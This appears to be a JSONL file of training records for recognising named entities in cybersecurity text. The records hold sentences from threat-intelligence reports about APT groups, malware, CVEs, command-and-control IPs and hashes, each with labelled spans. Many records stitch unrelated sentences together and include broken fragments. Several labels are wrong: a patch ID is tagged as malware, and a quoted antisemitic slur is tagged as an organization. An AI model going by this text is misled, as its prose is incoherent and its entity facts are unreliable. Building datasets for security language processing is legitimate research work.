{"text": "Rooting and Ad Network Presentation The reflection loaded methods check if the device is rooted . We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 . It is in use by the Molerats ( aka Gaza cybergang ) , a politically motivated group whose main objective , we believe , is intelligence gathering .", "spans": {"THREAT_ACTOR: actors": [[113, 119]], "VULNERABILITY: CVE-2017-0144": [[207, 220]], "MALWARE: MS17-010": [[260, 268]], "THREAT_ACTOR: Molerats": [[291, 299]], "THREAT_ACTOR: Gaza cybergang": [[306, 320]], "ORGANIZATION: politically": [[327, 338]]}, "info": {"id": "cyberner_stix_train_003664", "source": "cyberner_stix_train"}}
{"text": "Who is affected ? APT38 relies on DYEPACK , a SWIFT transaction-hijacking framework , to initiate transactions , steal money , and hide any evidence of the fraudulent transactions from the victimized bank . another optimizes it into blocks , The adversary may drop or create malware , tools , or other non - native files on a target system to accomplish this , potentially leaving behind traces of malicious activities .", "spans": {"THREAT_ACTOR: APT38": [[18, 23]], "TOOL: DYEPACK": [[34, 41]], "ORGANIZATION: bank": [[200, 204]], "ORGANIZATION: The adversary": [[242, 255]], "ORGANIZATION: a target system": [[324, 339]]}, "info": {"id": "cyberner_stix_train_003665", "source": "cyberner_stix_train"}}
{"text": "The infection chain is slightly more roundabout in the case of Apple devices . These data sets show that APT1 is either operating in China during normal Chinese business hours or that APT1 is intentionally going to painstaking lengths to look like they are . After Glimpse starts, it checks for the existence of a directory and lock . Ego", "spans": {"SYSTEM: Apple": [[63, 68]], "THREAT_ACTOR: APT1": [[105, 109], [184, 188]], "MALWARE: Glimpse": [[265, 272]]}, "info": {"id": "cyberner_stix_train_003666", "source": "cyberner_stix_train"}}
{"text": "For the TeamViewer-based activities , we have traces in the past until September 2012 . The document files exploit at least three known vulnerabilities in Microsoft Office , which we discuss in the Infection Techniques section .", "spans": {"FILEPATH: document files": [[92, 106]], "VULNERABILITY: exploit": [[107, 114]], "VULNERABILITY: vulnerabilities": [[136, 151]], "ORGANIZATION: Microsoft": [[155, 164]]}, "info": {"id": "cyberner_stix_train_003667", "source": "cyberner_stix_train"}}
{"text": "Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) . Traffic was intercepted on a node between the end machine and the Adobe servers , allowing Turla 's operators to replace the legitimate Flash executable with a trojanized version .", "spans": {"THREAT_ACTOR: Ke3chang": [[0, 8]], "VULNERABILITY: Java zero-day vulnerability": [[30, 57]], "VULNERABILITY: CVE-2012-4681": [[60, 73]], "MALWARE: Microsoft Word": [[119, 133]], "VULNERABILITY: CVE-2010-3333": [[136, 149]], "TOOL: Adobe PDF Reader": [[156, 172]], "VULNERABILITY: CVE-2010-2883": [[175, 188]], "THREAT_ACTOR: Turla": [[284, 289]]}, "info": {"id": "cyberner_stix_train_003668", "source": "cyberner_stix_train"}}
{"text": "Investigation of this domain led to additional domains that appear to have been registered for use with the campaign , but are not in use yet . In April 2017 , APT37 targeted South Korean military and government organizations with the DOGCALL backdoor and RUHAPPY wiper malware . After checking that the malware is not already installed , it unpacks HCK.cab using the Microsoft standard utility expand.exe . Who is the Winnti group ?", "spans": {"THREAT_ACTOR: APT37": [[160, 165]], "ORGANIZATION: military": [[188, 196]], "ORGANIZATION: government organizations": [[201, 225]], "TOOL: DOGCALL backdoor": [[235, 251]], "TOOL: RUHAPPY wiper malware": [[256, 277]], "FILEPATH: HCK.cab": [[350, 357]], "ORGANIZATION: Microsoft": [[368, 377]], "FILEPATH: expand.exe": [[395, 405]], "THREAT_ACTOR: Winnti group": [[419, 431]]}, "info": {"id": "cyberner_stix_train_003669", "source": "cyberner_stix_train"}}
{"text": "From the first cluster on the left , if we sort by incoming links per node a pattern stands out in the domain names looking similar to the previously mentioned Nymaim ones .", "spans": {"MALWARE: Nymaim": [[160, 166]]}, "info": {"id": "cyberner_stix_train_003670", "source": "cyberner_stix_train"}}
{"text": "The group primarily deploys spear-phishing e-mails to infect its targets , but was also responsible for a watering hole attack in 2013 . Although most malware today either seeks monetary gain or conducts espionage for economic advantage , both of these activity groups appear to seek information about specific individuals .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: economic": [[218, 226]], "THREAT_ACTOR: activity groups": [[253, 268]], "ORGANIZATION: specific individuals": [[302, 322]]}, "info": {"id": "cyberner_stix_train_003671", "source": "cyberner_stix_train"}}
{"text": "Shellbot is also used to control the botnet , with a command that is sent and run from the C&C to determine if there is a code execution in the shell , the hostname , and its architecture .", "spans": {"MALWARE: Shellbot": [[0, 8]], "TOOL: C&C": [[91, 94]]}, "info": {"id": "cyberner_stix_train_003672", "source": "cyberner_stix_train"}}
{"text": "The threat actors use custom batch scripts to create a list of files with predefined criteria and collate the identified files into a .rar archive ( see Figure 9 ) .", "spans": {"FILEPATH: .rar": [[134, 138]]}, "info": {"id": "cyberner_stix_train_003673", "source": "cyberner_stix_train"}}
{"text": "Bundling decoy documents is a common tactic by this group .", "spans": {}, "info": {"id": "cyberner_stix_train_003674", "source": "cyberner_stix_train"}}
{"text": "TA505 introduced Locky ransomware in February 2016 .", "spans": {"THREAT_ACTOR: TA505": [[0, 5]], "MALWARE: Locky": [[17, 22]]}, "info": {"id": "cyberner_stix_train_003675", "source": "cyberner_stix_train"}}
{"text": "If the main C2 domain is not responsive , the bot fetches a backup C2 domain from a Twitter account . Based on observed activity , we judge that APT38 's primary mission is targeting financial institutions and manipulating inter-bank financial systems to raise large sums of money for the North Korean regime . a switch statement is called in an infinite loop having multiple code blocks each performing operations . Monitor systems with access to OT resources for the creation of legitimate temporary folders , files , artifacts , and external libraries required as evidence of the execution of packaged Python scripts .", "spans": {"ORGANIZATION: Twitter": [[84, 91]], "THREAT_ACTOR: APT38": [[145, 150]], "ORGANIZATION: financial institutions": [[183, 205]]}, "info": {"id": "cyberner_stix_train_003676", "source": "cyberner_stix_train"}}
{"text": "Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection . We noticed that criminals were spreading Buhtrap using this method from May 2015 to August 2015 .", "spans": {"MALWARE: Catchamas": [[0, 9]], "THREAT_ACTOR: Buhtrap": [[189, 196]]}, "info": {"id": "cyberner_stix_train_003677", "source": "cyberner_stix_train"}}
{"text": "] 117:8080/api/v1/report/records.php hxxp : //88.99.227 [ . Our recent report , \" The Chronicles of the Hellsing APT : the Empire Strikes Back \" began with an introduction to the Naikon APT , describing it as \" One of the most active APTs in Asia , especially around the South China Sea \" . Additionally , Rancor is also using the Derusbi malware family to load a secondary payload once it infiltrates a target . PBI Research Services also reported a data breach that exposed information for 4.75 million people .", "spans": {"THREAT_ACTOR: Hellsing APT": [[104, 116]], "TOOL: Empire Strikes Back": [[123, 142]], "THREAT_ACTOR: Naikon APT": [[179, 189]], "THREAT_ACTOR: Rancor": [[306, 312]], "MALWARE: Derusbi": [[331, 338]], "ORGANIZATION: PBI Research Services": [[413, 434]]}, "info": {"id": "cyberner_stix_train_003678", "source": "cyberner_stix_train"}}
{"text": "Unit 42 actively monitors this group due to their persistent nature globally across all industry verticals .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]]}, "info": {"id": "cyberner_stix_train_003679", "source": "cyberner_stix_train"}}
{"text": "The ISCHECKIP and INSTARTUPFOLDER are not found in open source Quasar samples .", "spans": {"MALWARE: ISCHECKIP": [[4, 13]], "MALWARE: INSTARTUPFOLDER": [[18, 33]], "MALWARE: Quasar": [[63, 69]]}, "info": {"id": "cyberner_stix_train_003680", "source": "cyberner_stix_train"}}
{"text": "This powerful backdoor can receive commands from the attackers , enabling it to exfiltrate files from the system it is running on , execute additional scripts , delete files , and more . Confucius' operations include deploying bespoke backdoors and stealing files from their victim 's systems with tailored file stealers , some of which bore resemblances to Patchwork 's .", "spans": {"MALWARE: backdoor": [[14, 22]], "THREAT_ACTOR: Patchwork": [[355, 364]]}, "info": {"id": "cyberner_stix_train_003681", "source": "cyberner_stix_train"}}
{"text": "The host is possibly related to attacks that served the Pupy RAT , a publicly available cross-platform remote access tool .", "spans": {"TOOL: Pupy RAT": [[56, 64]]}, "info": {"id": "cyberner_stix_train_003682", "source": "cyberner_stix_train"}}
{"text": "In mid-November , Mandiant , a FireEye company , responded to the first Shamoon 2.0 incident against an organization located in the Gulf states . Some of the exploit server paths contain modules that appear to have been designed to infect Linux computers , but we have not yet located the Linux backdoor .", "spans": {"ORGANIZATION: Mandiant": [[18, 26]], "ORGANIZATION: FireEye": [[31, 38]], "VULNERABILITY: exploit": [[158, 165]], "SYSTEM: Linux": [[239, 244], [289, 294]]}, "info": {"id": "cyberner_stix_train_003683", "source": "cyberner_stix_train"}}
{"text": "Allows applications to change Wi-Fi connectivity state . These techniques permit the CIA to bypass the encryption of WhatsApp , Signal , Telegram , Wiebo , Confide and Cloackman by hacking the smart phones that they run on and collecting audio and message traffic before encryption is applied . The group has mainly targeted victims in the defense , military , and government sectors .", "spans": {"THREAT_ACTOR: CIA": [[85, 88]]}, "info": {"id": "cyberner_stix_train_003685", "source": "cyberner_stix_train"}}
{"text": "One of the attacks we investigated provided detailed insight into how Suckfly conducts its operations .", "spans": {"THREAT_ACTOR: Suckfly": [[70, 77]]}, "info": {"id": "cyberner_stix_train_003686", "source": "cyberner_stix_train"}}
{"text": "The latest of these campaigns that we are aware of occurred during the spring and early summer of 2015 .", "spans": {}, "info": {"id": "cyberner_stix_train_003687", "source": "cyberner_stix_train"}}
{"text": "As a modern Android spyware it is also capable of exfiltrating data from messaging applications ( WhatsApp , Viber , Facebook ) . The use of decoy documents also reveals some of the potential targets of the Lazarus group 's malicious activity , specifically the use spear phishing attacks observed targeting South Korean government and aerospace organizations . On February 12 , 2018 at 16:45 ( all times are in the organization’s local time ) , an email was sent to the organization advertising a job vacancy at an American global service provider . The collective ’s activity also supports domestic Russian promotion of support for the war .", "spans": {"SYSTEM: WhatsApp": [[98, 106]], "SYSTEM: Viber": [[109, 114]], "SYSTEM: Facebook": [[117, 125]], "TOOL: decoy documents": [[141, 156]], "THREAT_ACTOR: Lazarus group": [[207, 220]], "ORGANIZATION: government": [[321, 331]], "ORGANIZATION: aerospace organizations": [[336, 359]], "TOOL: email": [[449, 454]]}, "info": {"id": "cyberner_stix_train_003688", "source": "cyberner_stix_train"}}
{"text": "This assertion is based on the oldest currently known sample of another Duke related toolset , GeminiDuke , which was compiled on the 26th of January 2009 .", "spans": {"THREAT_ACTOR: Duke": [[72, 76]], "MALWARE: GeminiDuke": [[95, 105]]}, "info": {"id": "cyberner_stix_train_003689", "source": "cyberner_stix_train"}}
{"text": "This enables it to launch malicious apps without the user ’ s awareness and explicit consent . Currently , Sofacy targets large air-defense related commercial organizations in China with SPLM , and moves Zebrocy focus across Armenia , Turkey , Kazahkstan , Tajikistan , Afghanistan , Mongolia , China , and Japan . The client establishes a new connection with the remote command and control server hosted on a Bulgarian remote host 217.12.201.159 , part of a Virtual Dedicated Server subnet of the AS-21100, operated by ITL LLC .", "spans": {"IP_ADDRESS: 217.12.201.159": [[432, 446]], "TOOL: Virtual Dedicated Server": [[459, 483]], "TOOL: ITL": [[520, 523]], "TOOL: LLC": [[524, 527]]}, "info": {"id": "cyberner_stix_train_003690", "source": "cyberner_stix_train"}}
{"text": "So , users should beware of certain modified Android firmware . These instances of Gh0st RAT are consistently controlled from commercial Internet access accounts located on the island of Hainan , People's Republic of China . Once APT1 has established access , they periodically revisit the victim ’s network over several months or years and steal broad categories of intellectual property , including technology blueprints , proprietary manufacturing processes , test results , business plans , pricing documents , partnership agreements , and emails and contact lists from victim organizations ’ leadership . It uses a vulnerability discovered at the end December 2012 , CVE-2012 - 4792 .", "spans": {"SYSTEM: Android": [[45, 52]], "TOOL: Gh0st RAT": [[83, 92]], "THREAT_ACTOR: APT1": [[230, 234]], "TOOL: emails": [[544, 550]], "VULNERABILITY: CVE-2012 - 4792": [[672, 687]]}, "info": {"id": "cyberner_stix_train_003691", "source": "cyberner_stix_train"}}
{"text": "Zen apps gain access to root permissions from a rooting trojan in its infection chain . Group-IB reports that MoneyTaker uses both borrowed and their own self-written tools . Each phishing message contained the same malicious Microsoft Word attachment . This was likely to establish both persistence and secondary access , as in other environments .", "spans": {"MALWARE: Zen": [[0, 3]], "ORGANIZATION: Group-IB": [[88, 96]], "ORGANIZATION: Microsoft": [[226, 235]], "TOOL: Word": [[236, 240]]}, "info": {"id": "cyberner_stix_train_003692", "source": "cyberner_stix_train"}}
{"text": "com.db.mobilebanking com.botw.mobilebanking com.fg.wallet com.sbi.SBISecure com.icsfs.safwa com.interswitchng.www com.dhanlaxmi.dhansmart.mtc com.icomvision.bsc.tbc hr.asseco.android.jimba.cecro com.vanso.gtbankapp com.fss.pnbpsp com.mfino.sterling cy.com.netinfo.netteller.boc ge.mobility.basisbank com.snapwork.IDBI In particular , we noticed that the Naikon group was spear-phished by an actor we now call \" Hellsing \" . Gamaredon has been active since 2014 , and during this time , the modus operandi has remained almost the same . The lure contains a payment instruction form containing VBA code , which appears to have been sent from the State Treasury Service of Ukraine .", "spans": {"THREAT_ACTOR: Naikon group": [[354, 366]], "THREAT_ACTOR: actor": [[391, 396]], "THREAT_ACTOR: Hellsing": [[411, 419]], "THREAT_ACTOR: Gamaredon": [[424, 433]], "ORGANIZATION: the State Treasury Service of Ukraine": [[640, 677]]}, "info": {"id": "cyberner_stix_train_003693", "source": "cyberner_stix_train"}}
{"text": "This IP has been used to host a small number of domains , some of which were registered by the same actor , suggesting the IP is dedicated for a single individual or group ’s use .", "spans": {}, "info": {"id": "cyberner_stix_train_003694", "source": "cyberner_stix_train"}}
{"text": "PLATINUM primarily targets its intended victims using spear phishing . There are a number of factors in these groups' campaigns that suggests that the attackers may be based in Iran .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]]}, "info": {"id": "cyberner_stix_train_003695", "source": "cyberner_stix_train"}}
{"text": "] cendata [ . MoneyTaker has primarily been targeting card processing systems , including the AWS CBR ( Russian Interbank System ) and purportedly SWIFT ( US ) . We analyzed a recent sample that appears to have targeted entities in Taiwan , a target consistent with previous Ixeshe activity . Beginning in January 2021 , Mandiant Managed Defense observed the creation of web shells on one Microsoft Exchange server file system within a customer ’s environment .", "spans": {"MALWARE: Ixeshe": [[275, 281]], "ORGANIZATION: Mandiant Managed Defense": [[321, 345]]}, "info": {"id": "cyberner_stix_train_003696", "source": "cyberner_stix_train"}}
{"text": "Many groups leverage the regsvr32.exe application whitelisting bypass , including APT19 in their 2017 campaign against law firms . APT39 's focus on the telecommunications and travel industries suggests intent to perform monitoring , tracking , or surveillance operations against specific individuals , collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities , or create additional accesses and vectors to facilitate future campaigns .", "spans": {"MALWARE: regsvr32.exe": [[25, 37]], "THREAT_ACTOR: APT19": [[82, 87]], "ORGANIZATION: law firms": [[119, 128]], "THREAT_ACTOR: APT39": [[131, 136]], "ORGANIZATION: telecommunications and travel industries": [[153, 193]], "ORGANIZATION: specific individuals": [[280, 300]]}, "info": {"id": "cyberner_stix_train_003697", "source": "cyberner_stix_train"}}
{"text": "The documents shared the same themes for lures but the VBA macro and resulting PowerShell were more along the lines of what I expected .", "spans": {"TOOL: VBA macro": [[55, 64]], "TOOL: PowerShell": [[79, 89]]}, "info": {"id": "cyberner_stix_train_003698", "source": "cyberner_stix_train"}}
{"text": "ed234e61849dcb95223676abe2312e1378d6130c0b00851d82cda545b946ec83 27410d4019251a70d38f0635277f931fb73f67ac9f2e1f3b475ce680ebfde12a 6e6c210535b414c5aa2dd9e67f5153feeb43a8ac8126d8e249e768f501323a3e 4a32ced20df7001da7d29edc31ca76e13eef0c9b355f62c44888853435e9794f In the second set they are making use of a dynamic DNS service by ChangeIP.com . The new campaigns mark the first significant stirrings from the group since it went silent in January in the wake of a detailed expose of the group and its exploits — and a retooling of what security researchers believe is a massive spying operation based in China . FakeSG has different browser templates depending on which browser the victim is running .", "spans": {"TOOL: dynamic DNS service": [[303, 322]]}, "info": {"id": "cyberner_stix_train_003699", "source": "cyberner_stix_train"}}
{"text": "HenBox Roosts HenBox has evolved over the past three years , and of the almost two hundred HenBox apps in AutoFocus , the vast majority contain several native libraries as well as other components in order to achieve their objective . In 2014 , APT41 was observed carrying out espionage campaigns concurrently with financially motivated intrusions , demonstrating that they could balance different objectives simultaneously . We believe that APT28 's targeting of the MOD aligns with Russian threat perceptions .", "spans": {"MALWARE: HenBox": [[0, 6], [14, 20], [91, 97]], "THREAT_ACTOR: APT41": [[245, 250]], "THREAT_ACTOR: APT28": [[442, 447]]}, "info": {"id": "cyberner_stix_train_003700", "source": "cyberner_stix_train"}}
{"text": "Use of obfuscated malicious macro code .", "spans": {"TOOL: malicious macro code": [[18, 38]]}, "info": {"id": "cyberner_stix_train_003701", "source": "cyberner_stix_train"}}
{"text": "File Name : Joint Ministerial Council between the GCC and the EU Council.exe ” .", "spans": {"FILEPATH: Joint Ministerial Council between the GCC and the EU Council.exe": [[12, 76]]}, "info": {"id": "cyberner_stix_train_003702", "source": "cyberner_stix_train"}}
{"text": "It contains a Word document in plaintext ( written to Bienvenue_a_Sahaja_Yoga_Toulouse.doc ) , along with an executable ( Update.exe ) and DLL ( McUpdate.dll ) . The Trojan is quite similar to the .NET RocketMan Trojan and can handle the same commands; additionally , it includes the #screen” command to take a screenshot .", "spans": {"MALWARE: Word document": [[14, 27]], "MALWARE: Bienvenue_a_Sahaja_Yoga_Toulouse.doc": [[54, 90]], "MALWARE: Update.exe": [[122, 132]], "MALWARE: McUpdate.dll": [[145, 157]], "FILEPATH: Trojan": [[166, 172]], "FILEPATH: .NET RocketMan Trojan": [[197, 218]]}, "info": {"id": "cyberner_stix_train_003703", "source": "cyberner_stix_train"}}
{"text": "Victims have also been observed in Western Europe , Brazil , China , Japan , Mexico , New Zealand , South Korea , Turkey and Central Asian countries .", "spans": {}, "info": {"id": "cyberner_stix_train_003704", "source": "cyberner_stix_train"}}
{"text": "Figure 12 : Boot module After the patch module is extracted , the “ boot ” module executes it , using the same method described in the “ loader ” module . In other words , the attackers attracted our attention by attempting to exploit Kaspersky Lab products . This method has the additional benefit of being fileless : the code can be run without actually being saved on the file system . Fake browser updates are a very common decoy used by malware authors .", "spans": {"TOOL: Kaspersky Lab products": [[235, 257]], "MALWARE: Fake browser updates": [[389, 409]], "THREAT_ACTOR: malware authors": [[442, 457]]}, "info": {"id": "cyberner_stix_train_003705", "source": "cyberner_stix_train"}}
{"text": "Extract messages and the encryption key from the Telegram app . Symantec will continue to search for more Remsec modules and targets in order to build upon our understanding of Strider and better protect our customers . Perpetrated by an Arabic-speaking APT , MoleRATs : The modus-operandi of the attackers as well as the social engineering decoy content seem aligned with previous attacks carried out by an Arabic-speaking APT group called MoleRATs ( aka Gaza Cybergang ) . .bat \"", "spans": {"SYSTEM: Telegram": [[49, 57]], "ORGANIZATION: Symantec": [[64, 72]], "TOOL: Remsec modules": [[106, 120]], "THREAT_ACTOR: Strider": [[177, 184]], "THREAT_ACTOR: MoleRATs": [[260, 268], [441, 449]], "THREAT_ACTOR: Gaza Cybergang": [[456, 470]]}, "info": {"id": "cyberner_stix_train_003706", "source": "cyberner_stix_train"}}
{"text": "which was leaked last year . In 2018 , Silence conducted test campaigns to update their database of current targets and expand their attack geography . To reduce the risk of losing access to the internal bank network , the Carbanak , in addition to malicious programs , also used for remote access legitimate programs such as Ammy Admin and Team Viewer .", "spans": {"THREAT_ACTOR: Silence": [[39, 46]], "MALWARE: Carbanak": [[223, 231]], "MALWARE: Ammy Admin": [[326, 336]], "MALWARE: Team Viewer": [[341, 352]]}, "info": {"id": "cyberner_stix_train_003708", "source": "cyberner_stix_train"}}
{"text": "TG-4127 exploited the Hillary for America campaign's use of Gmail and leveraged campaign employees' expectation of the standard Gmail login page to access their email account .", "spans": {"THREAT_ACTOR: TG-4127": [[0, 7]], "TOOL: Gmail": [[60, 65], [128, 133]], "TOOL: email": [[161, 166]]}, "info": {"id": "cyberner_stix_train_003709", "source": "cyberner_stix_train"}}
{"text": "User messages created by the Trojan during installation typically contain grammatical and spelling errors , and use a mixture of Cyrillic and Latin characters . CTU researchers discovered the threat actors searching for \" [company] login \" , which directed them to the landing page for remote access . By shaping the attack , the group may be able to create niches in the underground , catering to the specific needs of their customers . Will Harrison was terminated as an Ashley Madison employee in November 2011 , and by early 2012 he ’d turned his considerable harassment skills squarely against the company .", "spans": {"ORGANIZATION: CTU": [[161, 164]], "THREAT_ACTOR: Will Harrison": [[438, 451]], "ORGANIZATION: Ashley Madison": [[473, 487]]}, "info": {"id": "cyberner_stix_train_003710", "source": "cyberner_stix_train"}}
{"text": "Users can see a “ Profile Downloaded ” added in their settings ( this feature is in iOS 12.2 , but not on iOS 12.1.1 ) . On November 26 , 2015 , a suspected China-based APT group sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies . This query is depicted below: 39e9D60005eca60000BCC64T.sample-domain.evil In the case of our sample traffic, the server responded with the following TXT resource record data: . Although KillMilk claims the activity was by their own group , the previous operations of Universal Dark Service targeted the Russian government and were critical of its actions .", "spans": {"SYSTEM: iOS 12.2": [[84, 92]], "SYSTEM: iOS 12.1.1": [[106, 116]], "THREAT_ACTOR: APT group": [[169, 178]], "ORGANIZATION: financial": [[258, 267]], "ORGANIZATION: high-tech companies": [[272, 291]], "FILEPATH: 39e9D60005eca60000BCC64T.sample-domain.evil": [[324, 367]], "THREAT_ACTOR: KillMilk": [[480, 488]], "ORGANIZATION: the Russian government": [[593, 615]]}, "info": {"id": "cyberner_stix_train_003711", "source": "cyberner_stix_train"}}
{"text": "The SectorJ04 group mainly utilizes a spear phishing email with MS Word or Excel files attached , and the document files downloads the Microsoft Installer (MSI) installation file from the attacker server and uses it to install backdoor on the infected system . The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 .", "spans": {"THREAT_ACTOR: SectorJ04": [[4, 13]], "MALWARE: document files": [[106, 120]], "THREAT_ACTOR: attacker": [[188, 196]], "FILEPATH: .rtf file": [[304, 313]], "VULNERABILITY: CVE-2017-0199": [[329, 342]]}, "info": {"id": "cyberner_stix_train_003712", "source": "cyberner_stix_train"}}
{"text": "Germany 's Der Spiegel re-published the slide set with far less deletions recently , in January 2015 , and therefore gave a deeper insight about what CSEC actually says they have tracked down . In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 .", "spans": {"ORGANIZATION: Der Spiegel": [[11, 22]], "TOOL: RTF": [[238, 241]], "ORGANIZATION: Microsoft": [[273, 282]], "SYSTEM: Windows": [[283, 290]], "VULNERABILITY: CVE-2017-0199": [[318, 331]]}, "info": {"id": "cyberner_stix_train_003713", "source": "cyberner_stix_train"}}
{"text": "Back in February 2016 , Indian army officials issued a warning against the usage of three apps , WeChat , SmeshApp , and Line , fearing that these apps collected too much information if installed on smartphones used by Indian army personnel . The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components .", "spans": {"ORGANIZATION: army officials": [[31, 45]], "TOOL: WeChat": [[97, 103]], "TOOL: SmeshApp": [[106, 114]], "TOOL: Line": [[121, 125]], "ORGANIZATION: army personnel": [[226, 240]], "MALWARE: ActiveX control": [[289, 304]], "FILEPATH: JavaScript file": [[319, 334]], "SYSTEM: Windows": [[419, 426]], "VULNERABILITY: CVE-2013-7331": [[446, 459]]}, "info": {"id": "cyberner_stix_train_003714", "source": "cyberner_stix_train"}}
{"text": "Command and Control T1437 Standard Application Layer Protocol Uses Firebase Cloud Messaging for C & C . Waterbug’s intrusions on the victim’s network continued for much of 2018 . During this time it has managed to avoid scrutiny by the security community .", "spans": {"THREAT_ACTOR: Waterbug’s": [[104, 114]]}, "info": {"id": "cyberner_stix_train_003715", "source": "cyberner_stix_train"}}
{"text": "Below is a fragment of such a log : Log with specified command Log files can be uploaded to the FTP server and sent to the attacker ’ s email inbox . Lazarus used watering hole attacks to compromise legitimate and trusted websites frequently visited by their targets . APT33 : f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5 S-SHA2 Gpppassword . In at least one instance , the malicious code was a lightweight Ruby script that was executed via the JumpCloud agent .", "spans": {"THREAT_ACTOR: Lazarus": [[150, 157]], "THREAT_ACTOR: APT33": [[269, 274]], "MALWARE: f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5 S-SHA2 Gpppassword": [[277, 360]]}, "info": {"id": "cyberner_stix_train_003716", "source": "cyberner_stix_train"}}
{"text": "The phishing page is translated in Korean , Japanese , Chinese , and English , which are hardcoded in the payload . Earworm first came to light in 2016 , when they managed to steal sensitive information from the US Democratic National Committee (DNC) . Anyway , just before the kill loop , the real malicious payload is executed : the", "spans": {"THREAT_ACTOR: Earworm": [[116, 123]], "ORGANIZATION: (DNC)": [[245, 250]]}, "info": {"id": "cyberner_stix_train_003717", "source": "cyberner_stix_train"}}
{"text": "While the application is in the background , although the service is already running , the beaconing will not start . There was a mistake in the original Morphisec analysis which linked these attacks to FIN7 . Hashes for tmp.vbs :b 958e481c90939962081b9fb85451a2fb28f705d5b5060f5d9d5aebfb390f8 . Cisco Talos recently worked with two vendors to patch multiple vulnerabilities in a favored software library used in chemistry laboratories and the Foxit PDF Reader , one of the most popular PDF reader alternatives to Adobe Acrobat .", "spans": {"ORGANIZATION: Morphisec": [[154, 163]], "THREAT_ACTOR: FIN7": [[203, 207]], "FILEPATH: tmp.vbs": [[221, 228]], "FILEPATH: :b 958e481c90939962081b9fb85451a2fb28f705d5b5060f5d9d5aebfb390f8": [[229, 293]], "ORGANIZATION: Cisco Talos": [[296, 307]], "TOOL: Foxit PDF Reader": [[444, 460]], "TOOL: Adobe Acrobat": [[514, 527]]}, "info": {"id": "cyberner_stix_train_003718", "source": "cyberner_stix_train"}}
{"text": "If the malware obtains device administrator rights , it will be able to lock the screen by itself , expire the password , and resist being uninstalled through normal methods . Similarly , APT37 targeting of a Middle Eastern company in 2017 is also consistent with North Korean objectives given the entity 's extensive relationships inside North Korea . The Remexi malware has been associated with an APT actor called Chafer by Symantec . As more actors enter this space , Cisco Talos is seeing an increasing number of ransomware variants emerge , leading to more frequent attacks and new challenges for cybersecurity professionals , particularly regarding actor attribution .", "spans": {"THREAT_ACTOR: APT37": [[188, 193]], "ORGANIZATION: company": [[224, 231]], "MALWARE: Remexi": [[357, 363]], "THREAT_ACTOR: Chafer": [[417, 423]], "ORGANIZATION: Symantec": [[427, 435]], "ORGANIZATION: Cisco Talos": [[472, 483]], "ORGANIZATION: cybersecurity professionals": [[603, 630]]}, "info": {"id": "cyberner_stix_train_003719", "source": "cyberner_stix_train"}}
{"text": "These examples , together with the HenBox app placed on a very specific third-party app store , point clearly to at least some of the intended targets of these malicious apps being Uyghurs , specifically those with interest in or association with terrorist groups . APT41 espionage operations against entities in these countries follow targeting of verticals consistent with Chinese national policy priorities . Instead , we observed the two Russian espionage groups compromise the same systems and engage separately in the theft of identical credentials .", "spans": {"MALWARE: HenBox": [[35, 41]], "THREAT_ACTOR: APT41": [[266, 271]], "ORGANIZATION: entities": [[301, 309]], "THREAT_ACTOR: espionage groups": [[450, 466]]}, "info": {"id": "cyberner_stix_train_003720", "source": "cyberner_stix_train"}}
{"text": "Yet the document cache published April 8 provides evidence that the NSA had once launched a series of successful computer-based intrusions against multiple high-profile foreign targets , including the Office of the President of Iran and the Russian Federal Nuclear Center . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups .", "spans": {"ORGANIZATION: NSA": [[68, 71]], "FILEPATH: document malware": [[300, 316]], "ORGANIZATION: Tibetan non-governmental organizations": [[336, 374]], "ORGANIZATION: NGOs": [[377, 381]], "ORGANIZATION: Falun Gong": [[403, 413]], "ORGANIZATION: Uyghur groups": [[418, 431]]}, "info": {"id": "cyberner_stix_train_003721", "source": "cyberner_stix_train"}}
{"text": "According to the configuration pattern , these actions are registered to certain events : Sync configuration data , upgrade modules , and download new payload ( This uses transport protocol ZProtocol encrypted by AES/CBC/PKCS5Padding algorithm to communicate with the C & C server . Flying Kitten ( which is another name given by the security industry to Charming Kitten ) was one of the first groups to be described as a coherent threat actor conducting operations against political opponents of the IRI ( Islamic Republic of Iran ) government and foreign espionage targets . the loop code becomes simpler . What prompted the data scientist Bullock to reach out were gobs of anti - Semitic diatribes from Harrison , who had taken to labeling Biderman and others “ greedy Jew bastards . ”", "spans": {"THREAT_ACTOR: Flying Kitten": [[283, 296]], "ORGANIZATION: security industry": [[334, 351]], "THREAT_ACTOR: Charming Kitten": [[355, 370]], "THREAT_ACTOR: groups": [[394, 400]], "THREAT_ACTOR: threat actor": [[431, 443]], "THREAT_ACTOR: espionage": [[557, 566]], "ORGANIZATION: Bullock": [[642, 649]], "THREAT_ACTOR: Harrison": [[706, 714]], "ORGANIZATION: Biderman": [[743, 751]], "ORGANIZATION: greedy Jew bastards": [[765, 784]]}, "info": {"id": "cyberner_stix_train_003722", "source": "cyberner_stix_train"}}
{"text": "Attackers have been known to distribute malicious files masquerading as the legitimate iviewers.dll file and then use DLL load hijacking to execute the malicious code and infect the computer .", "spans": {"FILEPATH: iviewers.dll": [[87, 99]], "TOOL: DLL": [[118, 121]]}, "info": {"id": "cyberner_stix_train_003723", "source": "cyberner_stix_train"}}
